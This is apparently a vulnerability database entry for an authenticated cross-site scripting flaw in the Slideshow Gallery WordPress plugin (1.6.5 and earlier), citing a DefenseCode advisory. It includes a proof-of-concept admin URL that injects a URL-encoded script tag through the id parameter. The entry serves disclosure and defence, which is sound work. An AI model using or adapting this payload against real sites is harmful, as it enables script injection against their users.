Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)

2017-04-1000:00:00

Neven Biruski

0.001 Low

EPSS

Percentile

26.4%

The Slideshow Gallery WordPress plugin was affected by a Multiple Authenticated Cross-Site Scripting (XSS) security vulnerability.

http://vulnerablesite.com/wp-admin/admin.php?page=slideshowgalleries&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

References

www.defensecode.com/advisories/DC-2017-01-014_WordPress_Tribulant_Slideshow_Gallery_Plugin_Advisory.pdf

packetstormsecurity.com/files/142079/

0.001 Low

EPSS

Percentile

26.4%

Related for WPEX-ID:A9056033-97C7-4753-822F-FAF99F4081E2